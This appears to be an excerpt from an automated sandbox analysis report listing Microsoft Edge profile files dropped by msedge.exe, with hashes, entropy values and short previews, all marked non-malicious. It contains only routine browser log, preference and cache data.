SHA1:	FF96F08A0739DB3EBD882301111BD0454FDD64A2
SHA-256:	6679354E03128393BEF6590E95E50D2D8A31C148979E613BA817630569F0054A
SHA-512:	7796ED19CBCB9B1B103DCF68F460E884B84128CB40C8D359BD11CF3B6E8BF2F76ED134478C7D86D3094C6CA396A3130DC8C4577457348CF38C0588E4D1CDF984
Malicious:	false
Preview:	2024/07/26-14:10:24.982 241c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparisonAssetStore.db since it was missing..2024/07/26-14:10:25.442 241c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparisonAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.570117335916099
Encrypted:	false
SSDEEP:	768:rmJ1aEWP+Mfe58F1+UoAYDCx9Tuqh0VfUC9xbog/OVoYzWmrw3vp8btuQ:rmJ1aEWP+Mfe5u1jaD4WjktH
MD5:	3818C5445B3C335D37428F29EEB7EEB3
SHA1:	8B580213643DB7391332FFA658C2C81F009A76D0
SHA-256:	87913EA947E03C87D0EB7D1DD4EC93879E5017C6B0D4FBA7903218F16B7DB027
SHA-512:	1358501CEC0EFE7162A4ABC90C2261688AB130100B544C4850A701262C8A6037E7B7FEBBD3478F82471F054A5288B5B8ED8A66065585396250374938D99850D8
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366491011613564","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366491011613564","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF49046.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.570117335916099
Encrypted:	false
SSDEEP:	768:rmJ1aEWP+Mfe58F1+UoAYDCx9Tuqh0VfUC9xbog/OVoYzWmrw3vp8btuQ:rmJ1aEWP+Mfe5u1jaD4WjktH
MD5:	3818C5445B3C335D37428F29EEB7EEB3
SHA1:	8B580213643DB7391332FFA658C2C81F009A76D0
SHA-256:	87913EA947E03C87D0EB7D1DD4EC93879E5017C6B0D4FBA7903218F16B7DB027
SHA-512:	1358501CEC0EFE7162A4ABC90C2261688AB130100B544C4850A701262C8A6037E7B7FEBBD3478F82471F054A5288B5B8ED8A66065585396250374938D99850D8
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366491011613564","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366491011613564","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	894
Entropy (8bit):	5.064392504872579
Encrypted:	false
SSDEEP:	24:Ra0ZZZZQ/UlJzJlIGntAjdkGKyjdVGEj88LC6tj60G8:tZZZZQ/izHnEdkGldEY88Lr08
MD5:	39459CB0A314410E2E574E0A8D510685
SHA1:	C2A07C7AF1BC4973AABB165ED200937D34E1582C
SHA-256:	030F0A3802BB31EAF9E686EC17897915D3B3D989E8BFD5BB9BB61FA138555B7D
SHA-512:	7492942C407DF7001D02ABAAB392C0ABABF20F45A40563C181108127E7B61C4C5C3A9B6F45905F0AD514179674D6B303F04D2B7CCE1EA9076879BD1535C36ACA
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................b-j................next-map-id.1.Knamespace-c04a10af_056e_4e31_93dc_5b23bc0c1dcc-https://accounts.google.com/.0..].k................next-map-id.2.Lnamespace-c04a10af_056e_4e31_93dc_5b23bc0c1dcc-https://accounts.youtube.com/.1....j................next-map-id.3.Knamespace-30e5feab_fa2c_4304_8c77_0f2ec854a940-https://accounts.google.com/.2Q.<sk................next-map-id.4.Lnamespace-30e5feab_fa2c_4304_8c77_0f2ec854a940-https://accounts.youtube.com/.3...........................................................................j................next-map-id.5.Knamespace-fbb2ea0f_dd68_4d95_87d3_7ee7c63b93ec-https://accounts.google.com/.4..A.k................next-map-id.6.Lnamespace-fbb2ea0f_dd68_4d95_87d3_7ee7c63b93ec-https://accounts.youtube.com/.5

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.1469219987538315
Encrypted:	false
SSDEEP:	6:BMykSUK+q2P923oH+TcwtrQMxIFUt84MykszZmw+4MykeptVkwO923oH+TcwtrQq:3krv4YebCFUt8iksz/+ikuT5LYebtJ
MD5:	CBEF0C101365B3B164FE08B3B3534B99
SHA1:	E5558972A6913B810612B5E5FE4B4D45D89AAF3B
SHA-256:	0371DE24BAED0F0026BB916618A190B642C60D83F1A14B28A66CC584231E3904
SHA-512:	CB2D972135077F0568FDC16F97578FA273A4CE5272531115E1BE1091D0D656DF0E9B8D1BFBA07275988CD7CB6705DD6181013CD634B2B40783A287055D89CE04
Malicious:	false
Preview:	2024/07/26-14:10:12.564 18e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/07/26-14:10:12.566 18e8 Recovering log #3.2024/07/26-14:10:12.568 18e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.1469219987538315
Encrypted:	false
SSDEEP:	6:BMykSUK+q2P923oH+TcwtrQMxIFUt84MykszZmw+4MykeptVkwO923oH+TcwtrQq:3krv4YebCFUt8iksz/+ikuT5LYebtJ
MD5:	CBEF0C101365B3B164FE08B3B3534B99
SHA1:	E5558972A6913B810612B5E5FE4B4D45D89AAF3B
SHA-256:	0371DE24BAED0F0026BB916618A190B642C60D83F1A14B28A66CC584231E3904
SHA-512:	CB2D972135077F0568FDC16F97578FA273A4CE5272531115E1BE1091D0D656DF0E9B8D1BFBA07275988CD7CB6705DD6181013CD634B2B40783A287055D89CE04
Malicious:	false
Preview:	2024/07/26-14:10:12.564 18e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/07/26-14:10:12.566 18e8 Recovering log #3.2024/07/26-14:10:12.568 18e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13366491014122649

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	23411
Entropy (8bit):	4.265918401128927
Encrypted:	false
SSDEEP:	192:3j33RGGSghGnSQG/ea83TeU2LThhZ5zCvveOF3NvwInnw28g7riq30BMeD2n8g7M:T33CgtQiUEThhS5CInnbXw5Y
MD5:	EB85B0C2AE351E27087B3A6FF7A09892
SHA1:	DD2D5D61D78DC761B5F16F3D118599310FFB1F09
SHA-256:	CFCC85C5507D4246279D1865209271826A982FBD8D2BC2AAFDA13F236A413BC0
SHA-512:	6506C2278FF45165D42B206425ED74BD82D3154561990938BA88F17DB53AE051FAEB09697134C16A716BE6B32B41EACCACD199BC3185DC4DD797D941B63EEC5E
Malicious:	false
Preview:	SNSS.........u..............u......."..u..............u..........u..........u..........u.....!....u..................................u...u.1..,.....u.$...c04a10af_056e_4e31_93dc_5b23bc0c1dcc.....u..........u.......x..........u......u..........................u.....................5..0.....u.&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......u..........u.................................u..................u.o...Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36.........................Not;A=Brand.....8.......Chromium....117.....Google Chrome.......117.........Not;A=Brand.....8.0.0.0.....Chromium....117.0.5938.132......Google Chrome.......117.0.5938.132......117.0.5938.132......Windows.....10.0.0......x86.............64...................u..................u.o...Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36.........................Not;A=Brand.....8.......Chromium...

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.151255137010404
Encrypted:	false
SSDEEP:	6:BMytet+q2P923oH+Tcwt7Uh2ghZIFUt84Myte5Zmw+4MytetVkwO923oH+Tcwt7w:3kov4YebIhHh2FUt8ik5/+ikT5LYebIT
MD5:	024D87F6EE418BC94B6C66D7D49F360F
SHA1:	91A6CB7DD2604D7DE8EA46CF1044E30176B5192A
SHA-256:	EAE18CEC3825F9A112687015175E7A06BDF51F5D51CE30766CBBA01DFF71AF33
SHA-512:	F7A70E4BE73001620E16EB619BE87F88E7E0AF20B076699DE64F0AD47EA6C5D113DB7878AF473B8CC3035743B5AE85D4F1F292B294F7DDBFA723CAE091BBA96F
Malicious:	false
Preview:	2024/07/26-14:10:11.689 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/07/26-14:10:11.689 14e8 Recovering log #3.2024/07/26-14:10:11.689 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.151255137010404
Encrypted:	false
SSDEEP:	6:BMytet+q2P923oH+Tcwt7Uh2ghZIFUt84Myte5Zmw+4MytetVkwO923oH+Tcwt7w:3kov4YebIhHh2FUt8ik5/+ikT5LYebIT
MD5:	024D87F6EE418BC94B6C66D7D49F360F
SHA1:	91A6CB7DD2604D7DE8EA46CF1044E30176B5192A
SHA-256:	EAE18CEC3825F9A112687015175E7A06BDF51F5D51CE30766CBBA01DFF71AF33
SHA-512:	F7A70E4BE73001620E16EB619BE87F88E7E0AF20B076699DE64F0AD47EA6C5D113DB7878AF473B8CC3035743B5AE85D4F1F292B294F7DDBFA723CAE091BBA96F
Malicious:	false
Preview:	2024/07/26-14:10:11.689 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/07/26-14:10:11.689 14e8 Recovering log #3.2024/07/26-14:10:11.689 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.236827186004656
Encrypted:	false
SSDEEP:	12:3kHlL+v4YebvqBQFUt8ikW/+ik+lLV5LYebvqBvJ:3O64YebvZg8ixBLYebvk
MD5:	330B3B349D5F7D0BCE3788A8F11F4120
SHA1:	605F54FE22B678342831F4357FDE20CF807D6818
SHA-256:	A6EAE3FC940E8FF715195211F40D084EAD29E7C80924ECFB14E156D73A5548AF
SHA-512:	626A386BB573B6A648CA36251F2FA10D3B6A400D01834258BC5BFA5D8522E9F23FE091E1EA9777000CC481EBAD2EF4EB5D099BAC917BBFB79448B8D6AAA9B60E
Malicious:	false
Preview:	2024/07/26-14:10:12.586 1d1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/07/26-14:10:12.590 1d1c Recovering log #3.2024/07/26-14:10:12.594 1d1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.236827186004656
Encrypted:	false
SSDEEP:	12:3kHlL+v4YebvqBQFUt8ikW/+ik+lLV5LYebvqBvJ:3O64YebvZg8ixBLYebvk
MD5:	330B3B349D5F7D0BCE3788A8F11F4120
SHA1:	605F54FE22B678342831F4357FDE20CF807D6818
SHA-256:	A6EAE3FC940E8FF715195211F40D084EAD29E7C80924ECFB14E156D73A5548AF
SHA-512:	626A386BB573B6A648CA36251F2FA10D3B6A400D01834258BC5BFA5D8522E9F23FE091E1EA9777000CC481EBAD2EF4EB5D099BAC917BBFB79448B8D6AAA9B60E
Malicious:	false
Preview:	2024/07/26-14:10:12.586 1d1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/07/26-14:10:12.590 1d1c Recovering log #3.2024/07/26-14:10:12.594 1d1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\36ba9d8c-2f4e-46ec-9373-3711516adb62.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5bae3cb1-3b51-4b2d-9baf-9baab0599ace.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF469a3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF4877c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\db49cd3c-7469-4f55-9fc8-97fe384fb1ce.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\de192d22-37bc-4462-8c59-800ae4ed8543.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.22589227104407
Encrypted:	false
SSDEEP:	12:3Brv4YebvqBZFUt8i6/+igT5LYebvqBaJ:3Br4Yebvyg8ieeLYebvL
MD5:	95F172A15DD7662D91E01EC388E7AC6D
SHA1:	1B5F5A6B457494D1BB20BEDED47E85BB60281213
SHA-256:	E31972FBAFF985FEBF9A67EFA9F9AD95E6E03F3DAC3878473FFA26E73B5B5595
SHA-512:	86D420D2003754AE82EE2D2ED1362DD783A28C90512EADAD7C4AAAD306E7DD6F7083DB16D1E943F854F7ED632226776EA1200C0F73DB5B786DBEE08370535924
Malicious:	false
